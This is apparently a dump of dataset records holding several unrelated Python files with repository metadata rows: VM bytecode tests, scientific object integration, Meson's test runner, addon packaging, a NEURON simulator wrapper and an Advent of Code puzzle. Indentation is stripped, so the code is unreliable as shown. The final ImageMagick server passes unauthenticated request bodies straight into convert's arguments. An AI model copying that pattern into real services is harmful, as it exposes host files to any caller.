def cmeth(cls, x):
print(x)
Thing.smeth(1492)
Thing.cmeth(1776)
""")
def test_unbound_methods(self):
self.assert_ok("""\
class Thing(object):
def meth(self, x):
print(x)
m = Thing.meth
m(Thing(), 1815)
""")
def test_unpacking(self):
self.assert_ok("""\
a, b, c = (1, 2, 3)
assert a == 1
assert b == 2
assert c == 3
""")
def test_exec_function(self):
self.assert_ok("""\
g = {}
exec("a = 11", g, g)
assert g['a'] == 11
""")
def test_jump_if_true_or_pop(self):
self.assert_ok("""\
def f(a, b):
return a or b
assert f(17, 0) == 17
assert f(0, 23) == 23
assert f(0, "") == ""
""")
def test_jump_if_false_or_pop(self):
self.assert_ok("""\
def f(a, b):
return not(a and b)
assert f(17, 0) is True
assert f(0, 23) is True
assert f(0, "") is True
assert f(17, 23) is False
""")
def test_pop_jump_if_true(self):
self.assert_ok("""\
def f(a):
if not a:
return 'foo'
else:
return 'bar'
assert f(0) == 'foo'
assert f(1) == 'bar'
""")
class TestComparisons(vmtest.VmTestCase):
def test_in(self):
self.assert_ok("""\
assert "x" in "xyz"
assert "x" not in "abc"
assert "x" in ("x", "y", "z")
assert "x" not in ("a", "b", "c")
""")
def test_less(self):
self.assert_ok("""\
assert 1 < 3
assert 1 <= 2 and 1 <= 1
assert "a" < "b"
assert "a" <= "b" and "a" <= "a"
""")
def test_greater(self):
self.assert_ok("""\
assert 3 > 1
assert 3 >= 1 and 3 >= 3
assert "z" > "a"
assert "z" >= "a" and "z" >= "z"
""")
| 25.62212
| 55
| 0.380935
| 5,520
| 0.991023
| 0
| 0
| 0
| 0
| 0
| 0
| 3,991
| 0.716517
|
7756950ec6fb5c1205ec5e03552facad7a4cc3ac
| 387
|
py
|
Python
|
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | 3
|
2021-06-20T02:24:10.000Z
|
2022-01-26T23:55:33.000Z
|
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
core/recc/compile/future.py
|
bogonets/answer
|
57f892a9841980bcbc35fa1e27521b34cd94bc25
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from importlib import import_module
def get_annotations_compiler_flag() -> int:
future = import_module("__future__")
assert future is not None
annotations = getattr(future, "annotations")
assert annotations is not None
compiler_flag = getattr(annotations, "compiler_flag")
assert isinstance(compiler_flag, int)
return compiler_flag
| 27.642857
| 57
| 0.731266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 63
| 0.162791
|
77576a10d402216d2e59b9e687478fa26a161c83
| 10,503
|
py
|
Python
|
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
genesis/objects/integrate.py
|
leifdenby/uclales-extractor
|
6147533e25b3b417c744bd814d2407a6588cf995
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import warnings
import xarray as xr
import numpy as np
# forget about using dask for now, dask_ndmeasure takes a huge amount of memory
# try:
# # raise ImportError
# # import dask_ndmeasure as ndimage
# # register a progressbar so we can see progress of dask'ed operations with xarray
# from dask.diagnostics import ProgressBar
# ProgressBar().register()
# except ImportError:
# from scipy import ndimage
# warnings.warn("Using standard serial scipy implementation instead of "
# "dask'ed dask-ndmeasure. Install `dask-ndmeasure` for much "
# "faster computation")
from scipy.constants import pi
from tqdm import tqdm
import dask_image.ndmeasure
from . import integral_properties
from . import minkowski_scales
from ..utils import find_grid_spacing
CHUNKS = 200 # forget about using dask for now, np.unique is too slow
FN_OUT_FORMAT = "{base_name}.objects.{objects_name}.integral.{name}.nc"
def make_name(variable, operator=None):
if operator:
return "{variable}.{operator}".format(**locals())
else:
return variable
def _integrate_scalar(objects, da, operator):
if "object_ids" in da.coords:
object_ids = da.object_ids
else:
# print("Finding unique values")
object_ids = np.unique(objects.chunk(None).values)
# ensure object 0 (outside objects) is excluded
if object_ids[0] == 0:
object_ids = object_ids[1:]
if len(da.dims) == 1 and len(objects.dims) == 3:
# special case for allowing integration of coordinates
da = xr.broadcast(objects, da)[1]
else:
import ipdb
with ipdb.launch_ipdb_on_exception():
assert objects.dims == da.dims
assert objects.shape == da.shape
dx = find_grid_spacing(da)
s = None
if operator == "volume_integral":
# fn = ndimage.sum
fn = dask_image.ndmeasure.sum
s = dx ** 3.0
operator_units = "m^3"
elif operator == "maximum_pos_z":
fn = dask_image.ndmeasure.maximum_position
operator_units = "m"
else:
# fn = getattr(ndimage, operator)
fn = getattr(dask_image.ndmeasure, operator)
operator_units = ""
# NB: the argument to `ndmeasure` functions used to be `labels` rather than
# `label_image` before dask-iamge v0.5.0
vals = fn(da, label_image=objects.values, index=object_ids)
if hasattr(vals, "compute"):
vals = vals.compute()
if s is not None:
vals *= s
if operator == "maximum_pos_z":
longname = "per-object z-pos of maximum {} value".format(da.name)
units = "m"
z_idxs = vals[:, da.dims.index("zt")]
vals = da.zt[z_idxs]
else:
longname = "per-object {} of {}".format(operator.replace("_", " "), da.name)
units = ("{} {}".format(da.units, operator_units)).strip()
da_integrated = xr.DataArray(
vals,
coords=dict(object_id=object_ids),
dims=("object_id",),
attrs=dict(longname=longname, units=units),
name="{}__{}".format(da.name, operator),
)
if da.name == "volume":
da_integrated.name = "volume"
return da_integrated
def _integrate_per_object(da_objects, fn_int):
if "object_ids" in da_objects.coords:
object_ids = da_objects.object_ids
else:
# print("Finding unique values")
object_ids = np.unique(da_objects.chunk(None).values)
# ensure object 0 (outside objects) is excluded
if object_ids[0] == 0:
object_ids = object_ids[1:]
if "xt" in da_objects.coords:
da_objects = da_objects.rename(dict(xt="x", yt="y", zt="z"))
ds_per_object = []
for object_id in tqdm(object_ids):
da_object = da_objects.where(da_objects == object_id, drop=True)
ds_object = fn_int(da_object)
ds_object["object_id"] = object_id
ds_per_object.append(ds_object)
return xr.concat(ds_per_object, dim="object_id")
def get_integration_requirements(variable):
if variable.endswith("_vertical_flux"):
var_name = variable[: len("_vertical_flux")]
return dict(w="w", scalar=var_name)
else:
return {}
def integrate(objects, variable, operator=None, **kwargs):
"""
Integrate over the labelled objects in `objects` the variable (named by a
string, .e.g `r_equiv` would be the equivalent spherical radius). Can also
integrate for example a scalar field provided through an extra kwarg to
find for example the maximum value.
Available variables:
{avail_vars}
Calculating equivalent radius for each object:
>> integrate(da_objects, variable='r_equiv')
Calculate the maximum value of vertical velocity for each object
>> integrate(da_objects, variable='w', operator='maximum', w=da_w)
Calculate the volume integral of water vapour for each object
>> integrate(da_objects, variable='q', operator='volume_integral', q=ds.q)
"""
ds_out = None
if variable in objects.coords:
da_scalar = objects.coords[variable]
elif variable == "com_angles":
fn_int = integral_properties.calc_com_incline_and_orientation_angle
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
elif hasattr(integral_properties, "calc_{}__dask".format(variable)):
fn_int = getattr(integral_properties, "calc_{}__dask".format(variable))
da_objects = objects
if "xt" in da_objects.dims:
da_objects = da_objects.rename(xt="x", yt="y", zt="z")
ds_out = fn_int(da_objects)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
elif hasattr(integral_properties, "calc_{}".format(variable)):
fn_int = getattr(integral_properties, "calc_{}".format(variable))
ds_out = _integrate_per_object(da_objects=objects, fn_int=fn_int)
try:
ds_out.name = variable
except AttributeError:
# we can't actually set the name of a dataset, this only works with
# data arrays
pass
# XXX: volume is actually calculated by the minkowski routines which have
# been verified against those below (keeping in case I forget)
# elif variable == 'volume':
# dx = find_grid_spacing(objects)
# da_scalar = xr.DataArray(
# np.ones_like(objects, dtype=np.float),
# coords=objects.coords, attrs=dict(units='1')
# )
# da_scalar.name = 'volume'
elif variable in [
"length_m",
"width_m",
"thickness_m",
"genus_m",
"volume",
"num_cells",
"filamentarity",
"planarity",
]:
ds_minkowski = minkowski_scales.main(da_objects=objects)
ds_out = ds_minkowski[variable]
elif variable == "r_equiv":
da_volume = integrate(objects, "volume", operator="sum")
# V = 4/3 pi r^3 => r = (3/4 V/pi)**(1./3.)
da_scalar = (3.0 / (4.0 * pi) * da_volume) ** (1.0 / 3.0)
da_scalar.attrs["units"] = "m"
da_scalar.attrs["long_name"] = "equivalent sphere radius"
da_scalar.name = "r_equiv"
ds_out = da_scalar
elif variable in kwargs and operator in [
"volume_integral",
"maximum",
"maximum_pos_z",
"mean",
"sum",
]:
da_scalar = kwargs[variable].squeeze()
if not objects.zt.equals(da_scalar.zt):
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
da_scalar = da_scalar.sel(zt=objects.zt)
# ds_out = _integrate_scalar(objects=objects.squeeze(),
# da=da_scalar,
# operator=operator)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
else:
if operator:
raise NotImplementedError(
f"Don't know how to calculate `{operator}` of `{variable}` with fields"
f"{', '.join(kwargs.keys())}`"
)
else:
raise NotImplementedError(
"Don't know how to calculate `{}`" "".format(variable)
)
# else:
# fn_scalar = "{}.{}.nc".format(base_name, variable)
# if not os.path.exists(fn_scalar):
# raise Exception("Couldn't find scalar file `{}`".format(fn_scalar))
# da_scalar = xr.open_dataarray(
# fn_scalar, decode_times=False, chunks=CHUNKS
# ).squeeze()
if ds_out is None:
if objects.zt.max() < da_scalar.zt.max():
warnings.warn(
"Objects span smaller range than scalar field to "
"reducing domain of scalar field"
)
zt_ = da_scalar.zt.values
da_scalar = da_scalar.sel(zt=slice(None, zt_[25]))
ds_out = _integrate_scalar(objects=objects, da=da_scalar, operator=operator)
return ds_out
# hack to set docstring at runtime so we can include the available variables
integrate.__doc__ = integrate.__doc__.format(
avail_vars=", ".join(integral_properties.VAR_MAPPINGS.keys())
)
if __name__ == "__main__":
import argparse
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("object_file")
argparser.add_argument("scalar_field")
argparser.add_argument("--operator", default="volume_integral", type=str)
args = argparser.parse_args()
object_file = args.object_file.replace(".nc", "")
op = args.operator
if "objects" not in object_file:
raise Exception()
base_name, objects_mask = object_file.split(".objects.")
fn_objects = "{}.nc".format(object_file)
if not os.path.exists(fn_objects):
raise Exception("Couldn't find objects file `{}`".format(fn_objects))
objects = xr.open_dataarray(fn_objects, decode_times=False, chunks=CHUNKS).squeeze()
name = make_name(
variable=args.scalar_field,
operator=op,
)
out_filename = FN_OUT_FORMAT.format(
base_name=base_name.replace("/", "__"), objects_name=objects.name, name=name
)
ds_out = integrate(
objects=objects, variable=args.scalar_field, operator=args.operator
)
import ipdb
with ipdb.launch_ipdb_on_exception():
ds_out.to_netcdf(out_filename)
print("Wrote output to `{}`".format(out_filename))
| 32.719626
| 88
| 0.63677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,727
| 0.354851
|
775775cc7a45c42108314eb9aa9a67d61fab3d99
| 181
|
py
|
Python
|
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
current_console.py
|
jonasitzmann/ann-numpy
|
bb6d22667158687ca2d3de92abbeee0e129fa18e
|
[
"MIT"
] | null | null | null |
from ann import *
x, y = utils.get_mnist_samples(100)
m = Model(x[0].shape)
m.add(Conv2D())
m.add(MaxPooling())
m.add(Flatten())
m.add(Dense(15))
m.add(Dense(10, a_func='sigmoid'))
| 20.111111
| 35
| 0.679558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.049724
|
77579ad9466e36640c85ebfa6cdc492815ea188c
| 1,923
|
py
|
Python
|
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
scripts/addon/generate_all.py
|
mozilla-releng/staging-mozilla-vpn-client
|
f31d3762a607ccf2d7c6a016f7b800305fbf0113
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
import hashlib
import json
import os
import subprocess
import sys
parser = argparse.ArgumentParser(description="Generate an addon package")
parser.add_argument(
"-q",
"--qt_path",
default=None,
dest="qtpath",
help="The QT binary path. If not set, we try to guess.",
)
args = parser.parse_args()
build_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "build.py")
addons_path = os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))),
"addons",
)
generated_path = os.path.join(addons_path, "generated")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
generated_path = os.path.join(generated_path, "addons")
if not os.path.isdir(generated_path):
os.mkdir(generated_path)
addons = []
for file in os.listdir(addons_path):
addon_path = os.path.join(addons_path, file, "manifest.json")
if not os.path.exists(addon_path):
print(f"Ignoring path {file}.")
continue
build_cmd = [sys.executable, build_path, addon_path, generated_path]
if args.qtpath:
build_cmd.append("-q")
build_cmd.append(args.qtpath)
subprocess.call(build_cmd)
generated_addon_path = os.path.join(generated_path, file + ".rcc")
if not os.path.exists(generated_addon_path):
exit(f"Expected addon file {generated_addon_path}")
with open(generated_addon_path,"rb") as f:
sha256 = hashlib.sha256(f.read()).hexdigest();
addons.append({ 'id': file, 'sha256': sha256 })
index = {
'api_version': '0.1',
'addons': addons,
}
with open(os.path.join(generated_path, "manifest.json"), "w") as f:
f.write(json.dumps(index, indent=2))
| 30.046875
| 82
| 0.696828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 510
| 0.265211
|
7758e5a6fe24718f7edc88625d84b3904624aa2d
| 8,310
|
py
|
Python
|
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
meson_test.py
|
tp-m/meson
|
2d1aa395e86848ca948d30d83cc5357777e5b490
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2013-2015 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, subprocess, time, datetime, pickle, multiprocessing, json
import concurrent.futures as conc
import argparse
import mesonlib
tests_failed = []
parser = argparse.ArgumentParser()
parser.add_argument('--wrapper', default=None, dest='wrapper',
help='wrapper to run tests with (e.g. valgrind)')
parser.add_argument('--wd', default=None, dest='wd',
help='directory to cd into before running')
parser.add_argument('--suite', default=None, dest='suite',
help='Only run tests belonging to this suite.')
parser.add_argument('args', nargs='+')
class TestRun():
def __init__(self, res, returncode, duration, stdo, stde, cmd):
self.res = res
self.returncode = returncode
self.duration = duration
self.stdo = stdo
self.stde = stde
self.cmd = cmd
def decode(stream):
try:
return stream.decode('utf-8')
except UnicodeDecodeError:
return stream.decode('iso-8859-1', errors='ignore')
def write_log(logfile, test_name, result_str, result):
logfile.write(result_str + '\n\n')
logfile.write('--- command ---\n')
if result.cmd is None:
logfile.write('NONE')
else:
logfile.write(' '.join(result.cmd))
logfile.write('\n--- "%s" stdout ---\n' % test_name)
logfile.write(result.stdo)
logfile.write('\n--- "%s" stderr ---\n' % test_name)
logfile.write(result.stde)
logfile.write('\n-------\n\n')
def write_json_log(jsonlogfile, test_name, result):
result = {'name' : test_name,
'stdout' : result.stdo,
'stderr' : result.stde,
'result' : result.res,
'duration' : result.duration,
'returncode' : result.returncode,
'command' : result.cmd}
jsonlogfile.write(json.dumps(result) + '\n')
def run_with_mono(fname):
if fname.endswith('.exe') and not mesonlib.is_windows():
return True
return False
def run_single_test(wrap, test):
global tests_failed
if test.fname[0].endswith('.jar'):
cmd = ['java', '-jar'] + test.fname
elif not test.is_cross and run_with_mono(test.fname[0]):
cmd = ['mono'] + test.fname
else:
if test.is_cross:
if test.exe_runner is None:
# Can not run test on cross compiled executable
# because there is no execute wrapper.
cmd = None
else:
cmd = [test.exe_runner] + test.fname
else:
cmd = test.fname
if len(wrap) > 0 and 'valgrind' in wrap[0]:
wrap += test.valgrind_args
if cmd is None:
res = 'SKIP'
duration = 0.0
stdo = 'Not run because can not execute cross compiled binaries.'
stde = ''
returncode = -1
else:
cmd = wrap + cmd + test.cmd_args
starttime = time.time()
child_env = os.environ.copy()
child_env.update(test.env)
if len(test.extra_paths) > 0:
child_env['PATH'] = child_env['PATH'] + ';'.join([''] + test.extra_paths)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=child_env, cwd=test.workdir)
timed_out = False
try:
(stdo, stde) = p.communicate(timeout=test.timeout)
except subprocess.TimeoutExpired:
timed_out = True
p.kill()
(stdo, stde) = p.communicate()
endtime = time.time()
duration = endtime - starttime
stdo = decode(stdo)
stde = decode(stde)
if timed_out:
res = 'TIMEOUT'
tests_failed.append((test.name, stdo, stde))
elif (not test.should_fail and p.returncode == 0) or \
(test.should_fail and p.returncode != 0):
res = 'OK'
else:
res = 'FAIL'
tests_failed.append((test.name, stdo, stde))
returncode = p.returncode
return TestRun(res, returncode, duration, stdo, stde, cmd)
def print_stats(numlen, tests, name, result, i, logfile, jsonlogfile):
startpad = ' '*(numlen - len('%d' % (i+1)))
num = '%s%d/%d' % (startpad, i+1, len(tests))
padding1 = ' '*(38-len(name))
padding2 = ' '*(8-len(result.res))
result_str = '%s %s %s%s%s%5.2f s' % \
(num, name, padding1, result.res, padding2, result.duration)
print(result_str)
write_log(logfile, name, result_str, result)
write_json_log(jsonlogfile, name, result)
def drain_futures(futures):
for i in futures:
(result, numlen, tests, name, i, logfile, jsonlogfile) = i
print_stats(numlen, tests, name, result.result(), i, logfile, jsonlogfile)
def filter_tests(suite, tests):
if suite is None:
return tests
return [x for x in tests if suite in x.suite]
def run_tests(options, datafilename):
logfile_base = 'meson-logs/testlog'
if options.wrapper is None:
wrap = []
logfilename = logfile_base + '.txt'
jsonlogfilename = logfile_base+ '.json'
else:
wrap = [options.wrapper]
logfilename = logfile_base + '-' + options.wrapper.replace(' ', '_') + '.txt'
jsonlogfilename = logfile_base + '-' + options.wrapper.replace(' ', '_') + '.json'
logfile = open(logfilename, 'w')
jsonlogfile = open(jsonlogfilename, 'w')
logfile.write('Log of Meson test suite run on %s.\n\n' % datetime.datetime.now().isoformat())
tests = pickle.load(open(datafilename, 'rb'))
if len(tests) == 0:
print('No tests defined.')
return
numlen = len('%d' % len(tests))
varname = 'MESON_TESTTHREADS'
if varname in os.environ:
try:
num_workers = int(os.environ[varname])
except ValueError:
print('Invalid value in %s, using 1 thread.' % varname)
num_workers = 1
else:
num_workers = multiprocessing.cpu_count()
executor = conc.ThreadPoolExecutor(max_workers=num_workers)
futures = []
filtered_tests = filter_tests(options.suite, tests)
for i, test in enumerate(filtered_tests):
if test.suite[0] == '':
visible_name = test.name
else:
if options.suite is not None:
visible_name = options.suite + ' / ' + test.name
else:
visible_name = test.suite[0] + ' / ' + test.name
if not test.is_parallel:
drain_futures(futures)
futures = []
res = run_single_test(wrap, test)
print_stats(numlen, filtered_tests, visible_name, res, i, logfile, jsonlogfile)
else:
f = executor.submit(run_single_test, wrap, test)
futures.append((f, numlen, filtered_tests, visible_name, i, logfile, jsonlogfile))
drain_futures(futures)
return logfilename
def run(args):
global tests_failed
options = parser.parse_args(args)
if len(options.args) != 1:
print('Test runner for Meson. Do not run on your own, mmm\'kay?')
print('%s [data file]' % sys.argv[0])
if options.wd is not None:
os.chdir(options.wd)
datafile = options.args[0]
logfilename = run_tests(options, datafile)
returncode = 0
if len(tests_failed) > 0:
print('\nOutput of failed tests (max 10):')
for (name, stdo, stde) in tests_failed[:10]:
print("{} stdout:\n".format(name))
print(stdo)
print('\n{} stderr:\n'.format(name))
print(stde)
print('\n')
returncode = 1
print('\nFull log written to %s.' % logfilename)
return returncode
if __name__ == '__main__':
sys.exit(run(sys.argv[1:]))
| 36.28821
| 97
| 0.601685
| 250
| 0.030084
| 0
| 0
| 0
| 0
| 0
| 0
| 1,626
| 0.195668
|
77592dd99f28334c1a356341edde3b576368b416
| 1,085
|
py
|
Python
|
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
2020/d05_1.py
|
PaulWichser/adventofcode
|
628d962a65188310af136c8b88acbdbd5dc94352
|
[
"MIT"
] | null | null | null |
import fileimp
# divide rows 0-127
# F = lower half
# B = upper half
# divide columns 0-7
# R = upper half
# L = lower half
# seat ID = row * 8 + col
# list of IDs
# max list
def idcalc(list):
seats = []
for i in list:
row = ''
col = ''
for j in i:
if j == 'F':
row = row + '0'
elif j == 'B':
row = row + '1'
elif j == 'R':
col = col + '1'
elif j == 'L':
col = col + '0'
else:
print("something went wrong in rows & cols")
quit()
print(row, col)
# row = row[::-1]
# col = col[::-1]
print(row, col)
row = int(row, 2)
col = int(col, 2)
print(row, col)
seats.append((row * 8) + col)
print(seats)
return seats
testlist = fileimp.listimp("d05_test.txt")
if max(idcalc(testlist)) != 820:
print("Test Failed!")
quit()
seatlist = fileimp.listimp("d05_input.txt")
print("Largest seat ID = ", max(idcalc(seatlist)))
| 22.604167
| 60
| 0.453456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 321
| 0.295853
|
7759ab5bb6b2419c0cf09ba0f8c0454651c021e4
| 3,618
|
py
|
Python
|
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | 1
|
2021-01-21T11:31:59.000Z
|
2021-01-21T11:31:59.000Z
|
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | null | null | null |
src/morphforge/simulation/neuron/core/neuronsimulationenvironment.py
|
mikehulluk/morphforge
|
2a95096f144ed4ea487decb735ce66706357d3c7
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.core import PluginDict
from morphforge.simulation.base import SimulationEnvironment
from morphforge.simulation.base import CurrentClampStepChange
from morphforge.simulation.base import VoltageClampStepChange
from morphforge.simulation.neuron.core import NEURONSimulationSettings
from morphforge.simulation.neuron.networks import NEURONGapJunction
from morphforge.simulation.neuron.core import NEURONCell
from morphforge.simulation.neuron.core import NEURONSimulation
class NEURONEnvironment(SimulationEnvironment):
_env_name = "NEURON"
def Simulation(self, **kwargs):
return NEURONSimulation(environment=self, **kwargs)
def Cell(self, **kwargs):
return NEURONCell(**kwargs)
def SimulationSettings(self, **kwargs):
return NEURONSimulationSettings(**kwargs)
channels = PluginDict()
presynapticmechanisms = PluginDict()
synapse_psm_template_type = PluginDict()
currentclamps = PluginDict()
voltageclamps = PluginDict()
@classmethod
def Channel(cls, chltype, **kwargs):
chl = cls.channels.get_plugin(chltype)
return chl(**kwargs)
@classmethod
def SynapticTrigger(cls, triggertype, **kwargs):
trigger_functor = cls.presynapticmechanisms.get_plugin(triggertype)
return trigger_functor(**kwargs)
def PostSynapticMechTemplate(self, psm_type, **kwargs):
tmpl_functor = self.synapse_psm_template_type.get_plugin(psm_type)
return tmpl_functor(**kwargs)
def CurrentClamp(self, protocol=CurrentClampStepChange, **kwargs):
current_clamp = self.currentclamps.get_plugin(protocol)
return current_clamp(**kwargs)
def VoltageClamp(self, protocol=VoltageClampStepChange, **kwargs):
voltage_clamp = self.voltageclamps.get_plugin(protocol)
return voltage_clamp(**kwargs)
def GapJunction(self, **kwargs):
return NEURONGapJunction(**kwargs)
def Synapse(self, **kwargs):
from morphforge.simulation.neuron.networks import NEURONSynapse
return NEURONSynapse(**kwargs)
| 37.6875
| 75
| 0.725263
| 1,589
| 0.439193
| 0
| 0
| 311
| 0.085959
| 0
| 0
| 1,516
| 0.419016
|
775a75fe1fae66dbea733bd14ae845c43584999a
| 766
|
py
|
Python
|
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | 2
|
2021-08-02T09:41:42.000Z
|
2021-08-10T05:26:52.000Z
|
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | null | null | null |
news_topic_modeling_service/backfill.py
|
rishavgiri6/News4U
|
d426eba97039a3d1afd90ecd14c454856b91f9d8
|
[
"Unlicense"
] | null | null | null |
import os
import sys
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
import news_topic_modeling_service_client
if __name__ == '__main__':
db = mongodb_client.get_db()
cursor = db['news'].find({})
count = 0
for news in cursor:
count += 1
print(count)
if 'class' in news:
print('Populating classes...')
description = news['description']
if description is None:
description = news['title']
topic = news_topic_modeling_service_client.classify(description)
news['class'] = topic
db['news'].replace_one({'digest': news['digest']}, news, upsert=True)
| 30.64
| 81
| 0.620104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 150
| 0.195822
|
775cbe05f1e23d8b5ab980d33a068bbf4e214d9f
| 2,559
|
py
|
Python
|
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
server/imagemagick-server/server.py
|
brygga-dev/workdir2
|
0b6e8f54a3d44ef8dedefd1bdc95f193467d239e
|
[
"MIT"
] | null | null | null |
from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
def append_args(cmd_list, cmd_args):
in_string = False
accum = ""
for i in range(0, len(cmd_args) - 1):
char = cmd_args[i]
if (in_string):
if (char == "'"):
cmd_list.append(accum)
accum = ""
in_string = False
else:
accum = accum + char
else:
if (char == " "):
if (accum != ""):
cmd_list.append(accum)
accum = ""
elif (accum == "" and char == "'"):
in_string = True
else:
accum = accum + char
if (accum != ""):
cmd_list.append(accum)
return cmd_list
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
#subprocess.Popen(["ls", "-la", "/imgs"])
#subprocess.Popen(["id", "-u"])
#subprocess.Popen(["id", "-u", "-n"])
content_length = int(self.headers['Content-Length'])
cmd_args = self.rfile.read(content_length).decode('utf-8')
if len(cmd_args) > 0:
print(cmd_args)
cmd_list = append_args(["convert"], cmd_args)
print(cmd_list)
CmdOut = subprocess.Popen(cmd_list)
(stdout,stderr) = CmdOut.communicate()
print(stdout)
print(stderr)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("ok".encode('utf-8'))
